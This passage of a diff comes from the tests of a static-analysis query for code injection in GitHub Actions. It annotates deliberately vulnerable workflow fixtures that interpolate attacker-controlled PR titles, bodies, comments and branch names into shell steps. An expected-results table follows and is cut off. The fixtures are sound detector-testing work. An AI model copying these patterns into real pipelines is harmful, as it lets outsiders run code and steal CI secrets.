${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.title.outputs.title }}" + echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.title.outputs.title }}" # $ Alert[actions/code-injection/critical] test2: runs-on: ubuntu-latest steps: - id: title run: | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH}) - echo "title=$PR_TITLE" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.title.outputs.title }}" + echo "title=$PR_TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.title.outputs.title }}" # $ Alert[actions/code-injection/critical] test3: runs-on: ubuntu-latest steps: - id: title run: | - echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV" - - run: echo "${{ env.TITLE }}" + echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV" # $ Source[actions/code-injection/critical] + - run: echo "${{ env.TITLE }}" # $ Alert[actions/code-injection/critical] test4: runs-on: ubuntu-latest steps: - id: title run: | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH}) - echo "TITLE=$PR_TITLE" >> "$GITHUB_ENV" - - run: echo "${{ env.TITLE }}" + echo "TITLE=$PR_TITLE" >> "$GITHUB_ENV" # $ Source[actions/code-injection/critical] + - run: echo "${{ env.TITLE }}" # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml index 0b3002506a14..bf5346b330d5 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml @@ -30,7 +30,7 @@ jobs: run_id: ${{ github.event.workflow_run.id }} name: pr-id - - name: get PR id + - name: get PR id # $ Source[actions/code-injection/critical] id: pr run: echo "value=$(> $GITHUB_OUTPUT @@ -42,7 +42,7 @@ jobs: run_id: ${{ github.event.workflow_run.id }} name: pr-ref - - name: get PR ref + - name: get PR ref # $ Source[actions/code-injection/critical] id: ref run: echo "value=$(> $GITHUB_OUTPUT @@ -122,7 +122,7 @@ jobs: - name: Get commit message id: commit-message - run: echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT + run: echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT # $ Source[actions/code-injection/critical] # ================= Deploy Demo ================= - name: 📦 Build demo @@ -227,5 +227,5 @@ jobs: "📑 Examples": "${{ needs.build-demo.outputs.preview-url }}/", "📚 Storybook": "${{ needs.build-storybook.outputs.preview-url }}/" } - } + } # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml index 559c69c4710f..712c6fb8100f 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml @@ -19,10 +19,10 @@ jobs: route: GET /repos/${{ github.repository }}/pulls/${{ github.event.issue.number }} env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - - name: Set PR source branch as env variable + - name: Set PR source branch as env variable # $ Source[actions/code-injection/critical] if: github.event_name == 'issue_comment' run: | - PR_SOURCE_BRANCH=$(echo '${{ steps.get-pr.outputs.data }}' | jq -r '.head.ref') + PR_SOURCE_BRANCH=$(echo '${{ steps.get-pr.outputs.data }}' | jq -r '.head.ref') # $ Alert[actions/code-injection/critical] echo "BRANCH=$PR_SOURCE_BRANCH" >> $GITHUB_ENV setup2: runs-on: ubuntu-latest @@ -36,13 +36,13 @@ jobs: pull_number: ${{ github.event.issue.number }} env: GITHUB_TOKEN: ${{ secrets.GH_TOKEN }} - - name: Set environment variables + - name: Set environment variables # $ Source[actions/code-injection/critical] run: | MERGE_STATUS=${{ fromJson(steps.get-pr-details.outputs.data).mergeable }} if $MERGE_STATUS; then echo "COMMENT=\[Fast Forward CI\] ${{ env.HEAD_REF }} cannot be merged into ${{ env.BASE_REF }} at the moment." >> $GITHUB_ENV; fi echo "MERGE_STATUS=$MERGE_STATUS" >> $GITHUB_ENV echo "BASE_REF=${{ fromJson(steps.get-pr-details.outputs.data).base.ref }}" >> $GITHUB_ENV - echo "HEAD_REF=${{ fromJson(steps.get-pr-details.outputs.data).head.ref }}" >> $GITHUB_ENV + echo "HEAD_REF=${{ fromJson(steps.get-pr-details.outputs.data).head.ref }}" >> $GITHUB_ENV # $ Alert[actions/code-injection/critical] setup3: runs-on: ubuntu-latest steps: @@ -52,8 +52,8 @@ jobs: route: GET /repos/${{ github.repository_owner }}/${{ github.repository }}/issues?state=open env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN}} - - run: | - echo '${{ steps.issues.outputs.data }}' > issues.json + - run: | # $ Source[actions/code-injection/critical] + echo '${{ steps.issues.outputs.data }}' > issues.json # $ Alert[actions/code-injection/critical] setup4: runs-on: ubuntu-latest steps: @@ -65,10 +65,10 @@ jobs: repo: bar pull_number: ${{ github.event.issue.number }} - - run: >- + - run: >- # $ Source[actions/code-injection/critical] echo "Pull request title is \"${{ fromJson(steps.get-pull-request.outputs.data).title }}\" but expected - \"Updated test pull request\"" && exit 1 + \"Updated test pull request\"" && exit 1 # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml index 552ad866b5ae..ba51066def8b 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml @@ -13,9 +13,9 @@ jobs: env: GITHUB_TOKEN: ${{ secrets.GITHUBACTIONS_TOKEN }} - - name: Write issues to file + - name: Write issues to file # $ Source[actions/code-injection/critical] run: | - echo '${{ steps.issues.outputs.data }}' > issues.json + echo '${{ steps.issues.outputs.data }}' > issues.json # $ Alert[actions/code-injection/critical] - name: Setup Node.js uses: actions/setup-node@v2 diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml index 2773c1044db1..9ee26e0d6265 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml @@ -10,102 +10,102 @@ jobs: - id: head_ref run: | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName') - echo "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.head_ref.outputs.head_ref}}" + echo "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.head_ref.outputs.head_ref}}" # $ Alert[actions/code-injection/critical] - id: title run: | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title) - echo "title=$TITLE" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.title.outputs.title}}" + echo "title=$TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.title.outputs.title}}" # $ Alert[actions/code-injection/critical] - id: body run: | BODY=$(gh pr view $PR_NUMBER --json body --jq .body) - echo "body=$BODY" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.body.outputs.body}}" + echo "body=$BODY" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.body.outputs.body}}" # $ Alert[actions/code-injection/critical] - id: comments run: | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')" - echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.comments.outputs.comments}}" + echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.comments.outputs.comments}}" # $ Alert[actions/code-injection/critical] - id: files run: | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')" - echo "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.files.outputs.files}}" + echo "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.files.outputs.files}}" # $ Alert[actions/code-injection/critical] - id: author run: | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') - echo "author=$AUTHOR" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.author.outputs.author}}" + echo "author=$AUTHOR" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.author.outputs.author}}" # $ Alert[actions/code-injection/critical] pulls2: runs-on: ubuntu-latest steps: - id: head_ref run: | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' | head -n 1) - echo "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.head_ref.outputs.head_ref}}" + echo "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.head_ref.outputs.head_ref}}" # $ Alert[actions/code-injection/critical] - id: title run: | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title") - echo "title=$TITLE" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.title.outputs.title}}" + echo "title=$TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.title.outputs.title}}" # $ Alert[actions/code-injection/critical] - id: body run: | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body") - echo "body=$BODY" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.body.outputs.body}}" + echo "body=$BODY" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.body.outputs.body}}" # $ Alert[actions/code-injection/critical] - id: comments run: | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body') - echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.comments.outputs.comments}}" + echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.comments.outputs.comments}}" # $ Alert[actions/code-injection/critical] - id: files run: | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename') - echo "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.files.outputs.files}}" + echo "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.files.outputs.files}}" # $ Alert[actions/code-injection/critical] - id: author run: | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login") - echo "author=$AUTHOR" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.author.outputs.author}}" + echo "author=$AUTHOR" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.author.outputs.author}}" # $ Alert[actions/code-injection/critical] issues1: runs-on: ubuntu-latest steps: - id: title run: | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title') - echo "title=$TITLE" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.title.outputs.title}}" + echo "title=$TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.title.outputs.title}}" # $ Alert[actions/code-injection/critical] - id: body run: | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body') - echo "body=$BODY" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.body.outputs.body}}" + echo "body=$BODY" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.body.outputs.body}}" # $ Alert[actions/code-injection/critical] - id: comments run: | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body') - echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.comments.outputs.comments}}" + echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.comments.outputs.comments}}" # $ Alert[actions/code-injection/critical] issues2: runs-on: ubuntu-latest steps: - id: title run: | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title") - echo "title=$TITLE" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.title.outputs.title}}" + echo "title=$TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.title.outputs.title}}" # $ Alert[actions/code-injection/critical] - id: body run: | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body") - echo "body=$BODY" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.body.outputs.body}}" + echo "body=$BODY" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.body.outputs.body}}" # $ Alert[actions/code-injection/critical] - id: comments run: | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body') - echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.comments.outputs.comments}}" + echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.comments.outputs.comments}}" # $ Alert[actions/code-injection/critical] pulls3: runs-on: ubuntu-latest steps: @@ -113,20 +113,20 @@ jobs: run: | DETAILS=$(gh pr view $PR_NUMBER --json "title,author,headRefName") TITLE=$(echo $DETAILS | jq -r '.title') - echo "title=$TITLE" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.title1.outputs.title}}" + echo "title=$TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.title1.outputs.title}}" # $ Alert[actions/code-injection/critical] - id: title2 run: | TITLE=$(gh pr view $PR_NUMBER --json "title,author,headRefName") TITLE=$(echo $TITLE | jq -r '.title') - echo "title=$TITLE" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.title2.outputs.title}}" + echo "title=$TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.title2.outputs.title}}" # $ Alert[actions/code-injection/critical] - id: title3 run: | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title,author) TITLE=$(echo $TITLE | jq -r '.title') - echo "title=$TITLE" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.title3.outputs.title}}" + echo "title=$TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.title3.outputs.title}}" # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml index 03ee63fe9cf4..5bca1705b9db 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml @@ -22,9 +22,9 @@ jobs: filters: | locale: - '*.xml' - - name: Changed files 1 + - name: Changed files 1 # $ Source[actions/code-injection/critical] run: | - echo changed: ${{ steps.changed.outputs.locale_files }} + echo changed: ${{ steps.changed.outputs.locale_files }} # $ Alert[actions/code-injection/critical] echo changed: ${{ steps.changed.outputs.changes }} - name: Check for relevant changes uses: dorny/paths-filter@v3 @@ -34,9 +34,9 @@ jobs: filters: | locale: - '*.xml' - - name: Changed files 2 + - name: Changed files 2 # $ Source[actions/code-injection/critical] run: | - echo changed:${{ steps.changed2.outputs.locale_files }} + echo changed:${{ steps.changed2.outputs.locale_files }} # $ Alert[actions/code-injection/critical] echo changed: ${{ steps.changed2.outputs.changes }} - name: Check for relevant changes uses: dorny/paths-filter@v3 diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml index 27d8a666fc9e..9f906d507cfe 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml @@ -12,7 +12,7 @@ jobs: echo " " echo "github.ref = ${{ github.ref }}" echo "github.sha = ${{ github.sha }}" - echo "github.event.pull_request.head.ref = ${{ github.event.pull_request.head.ref }}" + echo "github.event.pull_request.head.ref = ${{ github.event.pull_request.head.ref }}" # $ Alert[actions/code-injection/medium] echo "github.event.pull_request.head.sha = ${{ github.event.pull_request.head.sha }}" echo "github.event.pull_request.base.ref = ${{ github.event.pull_request.base.ref }}" echo "github.event.pull_request.base.sha = ${{ github.event.pull_request.base.sha }}" diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml index 03ecc20de86a..292891b8ccb4 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml @@ -19,6 +19,6 @@ jobs: id: extract_info shell: bash run: | - echo "version=$( echo "${{ github.event.head_commit.message }}" | sed 's/^release: v\([0-9]\+\.[0-9]\+\.[0-9]\+\).*$/\1/' )" >> $GITHUB_OUTPUT - echo "pr_number=$( echo "${{ github.event.head_commit.message }}" | sed 's/.*(\#\([0-9]\+\)).*$/\1/' )" >> $GITHUB_OUTPUT - echo "release_branch=release/v$( echo "${{ github.event.head_commit.message }}" | sed 's/^release: v\([0-9]\+\.[0-9]\+\).*$/\1/' )" >> $GITHUB_OUTPUT + echo "version=$( echo "${{ github.event.head_commit.message }}" | sed 's/^release: v\([0-9]\+\.[0-9]\+\.[0-9]\+\).*$/\1/' )" >> $GITHUB_OUTPUT # $ Alert[actions/code-injection/medium] + echo "pr_number=$( echo "${{ github.event.head_commit.message }}" | sed 's/.*(\#\([0-9]\+\)).*$/\1/' )" >> $GITHUB_OUTPUT # $ Alert[actions/code-injection/medium] + echo "release_branch=release/v$( echo "${{ github.event.head_commit.message }}" | sed 's/^release: v\([0-9]\+\.[0-9]\+\).*$/\1/' )" >> $GITHUB_OUTPUT # $ Alert[actions/code-injection/medium] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml index c1846b8f51ec..3661cd885a44 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml @@ -14,6 +14,6 @@ jobs: label_marker_start: '>>' label_marker_end: '<<' - - name: Show parsed data JSON + - name: Show parsed data JSON # $ Source[actions/code-injection/critical] run: | - echo ${{ steps.parse.outputs.payload }} + echo ${{ steps.parse.outputs.payload }} # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml index 0bd666dc9485..5cf1093c8bbc 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml @@ -9,5 +9,5 @@ jobs: - name: Issue Forms Body Parser id: parse uses: zentered/issue-forms-body-parser@v2.0.0 - - run: echo ${{ steps.parse.outputs.data }} - - run: echo ${{ toJSON(steps.parse.outputs.data) }} + - run: echo ${{ steps.parse.outputs.data }} # $ Alert[actions/code-injection/critical] Source[actions/code-injection/critical] + - run: echo ${{ toJSON(steps.parse.outputs.data) }} # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml index 8648d86983ee..532ce731d104 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml @@ -17,7 +17,7 @@ jobs: - name: Fetch the issue id: read_issue_body run: - echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT + echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT # $ Source[actions/code-injection/critical] - name: Issue Forms Body Parser id: parse @@ -25,5 +25,5 @@ jobs: with: body: ${{ steps.read_issue_body.outputs.body }} - - run: echo ${{ steps.parse.outputs.data }} - - run: echo ${{ toJSON(steps.parse.outputs.data) }} + - run: echo ${{ steps.parse.outputs.data }} # $ Alert[actions/code-injection/critical] + - run: echo ${{ toJSON(steps.parse.outputs.data) }} # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml index e9ba77c0f939..86e76277f6e9 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml @@ -38,7 +38,7 @@ jobs: persist-credentials: false ref: ${{ steps.get-sha.outputs.sha }} fetch-depth: 0 - - name: Get version + - name: Get version # $ Source[actions/code-injection/critical] id: get-version run: | echo "chart_version=$(> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | ${{ steps.git-commit.outputs.file-list }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | .github/workflows/image_link_generator.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:3:3:3:8 | issues | issues | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/level1.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ 